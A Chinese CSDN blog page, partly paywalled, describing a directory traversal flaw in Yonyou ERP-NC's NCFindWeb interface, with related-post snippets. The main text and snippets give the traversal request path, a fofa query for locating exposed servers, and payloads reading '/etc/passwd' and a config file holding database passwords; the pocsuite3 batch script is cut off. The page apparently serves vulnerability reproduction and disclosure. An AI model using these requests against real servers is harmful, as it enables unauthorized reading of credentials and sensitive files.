SRC-用友 ERP-NC NCFindWeb 目录遍历漏洞

最新推荐文章于 2024-04-20 23:11:52 发布
最新推荐文章于 2024-04-20 23:11:52 发布
阅读量763 收藏
点赞数
分类专栏: SRC 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/134250923
版权
本文介绍了用友ERP-NC系统中存在的目录遍历漏洞,攻击者能够通过构造特定URL获取敏感文件。提供了POC验证方法,包括手动验证和使用pocsuite3工具进行批量验证。此外,还提及了安全学习资源,包括技术文档、书籍、面试题和视频教程,以助于提升安全技能。
摘要由CSDN通过智能技术生成

漏洞描述

用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。

fofa:

poc:/NCFindWeb?service=IPreAlertConfigService&filename=
在url处拼接poc后可以看到该站点的目录和文件

访问某个文件
/NCFindWeb?service=IPreAlertConfigService&filename=文件名

编写poc批量验证
这里使用的是pocsuite3的poc模板

# 调用pocsuite的一些API函数
from pocsuite3.api import Output, register_poc, requests, POCBase

# 继承POCBase类
c
最低0.47元/天 解锁文章
zkzq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友OA漏洞学习——NCFindWeb 目录遍历漏洞
记录并分享学习安全的知识点..
07-03 1398
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
【1day】复现用友 NC NCFindWeb大型企业数字化平台及用友系统uapjs(jsinvoke)任意文件上传漏洞
记录并分享学习安全的知识点..
07-25 999
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
用友NC目录遍历漏洞
DUANYU23的博客
04-26 2705
用友NC目录遍历漏洞0X001前言0X002 漏洞影响0X003 漏洞原理0X004 漏洞复现0X041 空间搜索寻找目标0X005 POC0X006 修复建议 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 搜索语法:title="Azkaban" 0X042 访问网页(目录遍历) http://ip/NCFindWeb?service=IPreAlertConfigService&filename 0X005 POC 0X0
用友OA漏洞复现手册_cnnvd-201610-923,2024字节跳动春招技术面试题
最新发布
2301_76223496的博客
04-20 561
title=“用友GRP-U8行政事业内控管理软件”(4)查看指定数据库,表中字段的字段值。(3)查看指定表中的字段名。查看所有数据库中的表名。
用友NC目录遍历漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-18 2336
简介: 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。 漏洞复现: fofa直接搜索: app="用友-UFIDA-NC" 漏洞拼接目录: /NCFindWeb?service=IPreAlertConfigService&filename /NCFindWeb?service=IPreAlertConfigService&filename= 读取:filename=读取的文件名 ...
用友NC 漏洞
2301_80115097的博客
12-01 307
NCFindWeb?service=IPreAlertConfigService&filename=文件名。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。使用pocsuite3批量验证。
(新接口)用友NC某接口存在任意文件读取漏洞-0day
weixin_43167326的博客
02-22 1528
用友NC是一款企业级ERP(企业资源计划)软件,它提供了全面的财务、人力资源、采购、销售、生产等各种业务管理模块,适用于中小型企业和大型集团公司。用友NC具有良好的可扩展性和可定制性,可以满足企业在不同行业和不同规模下的管理需求。该系统基于Java EE技术开发,具有跨平台、集成度高、业务流程自动化、信息共享等特点,能够有效提高企业的管理效率和降低成本,是众多企业的首选管理软件。。
用友ERP-NC管理软件在集团企业财务管理中的运用最终版.pdf
11-17
用友ERP-NC管理软件在集团企业财务管理中的运用最终版.pdf
用友ERP-U890财务会计功能介绍
11-22
用友ERP-U890是一款针对企业财务会计的高级管理系统,旨在帮助企业实现精细化管理与敏捷经营。该系统的核心功能涵盖了多个方面,确保企业能够高效、准确地进行财务核算和管理。 1. 存货价值管理:用友ERP-U890能够...
用友ERP-U890财务软件实用教程.ppt
11-12
用友ERP-U890财务软件实用教程.ppt
用友erp-u8操作说明改.docx
05-26
用友erp-u8操作说明改
用友ERP-U8预算管理方案研讨.docx
06-01
用友ERP-U8预算管理方案研讨
用友ERP-NC系统 漏洞 NCFindWeb接口任意文件下载
ShenZ的博客
07-28 2358
漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码 WEB-INF/web.xml ../../../../../etc/passwd ...
用友NC任意文件读取
voctor2436的博客
05-24 1235
用友NC产品的全新系列、是面向集团企业的世界级高端管理软件,用友NC6的产品定位于大型企业管理与电子商务平台。用友NCFindWeb文件存在任意文件读取漏洞,攻击者通过漏洞可以获取网站源码,导致服务器失陷。用友NC采用J2EE架构和先进开放的集团级开发平台UAP,形成了集团管控8大领域15大行业68个细分行业的解决方案。一般性的建议:关注官方新版本的发布及补丁更新,建议使用对应WAF/IPS进行防护。
用友ERP-NC系统 NCFindWeb接口文件读取
maverickpig的博客
03-10 2009
用友NC NCfindweb接口文件读取漏洞
用友ERP系统
ajlgl的博客
05-24 5225
用友ERP
《软件外包服务岗前技能训练(二)》之学习用友ERP系统供应商寄存采购业务
m0_64064695的博客
12-27 965
总的来说,学习用友系统不仅涉及到技术操作,也包括理解业务流程、重视细节、提升专业技能以及适应系统更新等多个方面,让我们在今后的学习中不断成长吧!
用友 ERP 修改生产订单生产部门和生产类别语句
m0_61834747的博客
12-08 56
SELECT MDeptCode,MoTypeId ,* FROM mom_orderdetail WHERE MoId='1000000934'UPDATE mom_orderdetailSET MoTypeId = '1000000004'WHERE MoId IN ( '1000001456','1000002059','1000002180','1000002212' ,'1000002041','1000002213');SELECT * FROM dbo.mom_order WHERE MoCo
用友ERP-U8(V8.72)模拟实战----财务、供应链和生产制造》一1.3 安装用友ERP-U8(V8.72)软件...
weixin_34099526的博客
05-02 583
本节书摘来自异步社区《用友ERP-U8(V8.72)模拟实战----财务、供应链和生产制造》一书中的第1章,第1.3节,作者 龚中华 , 何平,更多章节内容可以访问云栖社区“异步社区”公众号查看 1.3 安装用友ERP-U8(V8.72)软件 用友ERP-U8(V8.72)模拟实战----财务、供应链和生产制造如果用户从用友公司购买用友软件,用友公司将上...
用友ERP-U8 V10.1
10-06
引用和引用[2]提到了用友U8 V10.1是一款企业资源规划(ERP)软件。根据引用的描述,要让用友与数据库相连,需要通过用友的“应用服务器配置”,确保U8与数据库成功连接,然后插上硬件加密狗并重启系统。 引用提供了当前环境的详细分析,包括用友U8V10.1的版本、独立账套数量、数据大小、SQL SERVER2000的版本、IP地址和名称,以及用友U8V10.1所使用的硬件加密狗。 另外,引用提到,在安装新的HP服务器软件环境后,可以通过局域网直接拷贝用友D:\U8SOFT\Admin\SERVER目录下的所有数据库和日志文件到新服务器对应的目录下,这些文件包括权限、单据格式和账套数据。 总结来说,用友ERP-U8 V10.1是一款功能强大的企业资源规划软件,通过配置应用服务器,插入硬件加密狗并确保与数据库连接,可以实现系统的正常运行。此外,还可以通过拷贝数据库和日志文件到新服务器来迁移系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值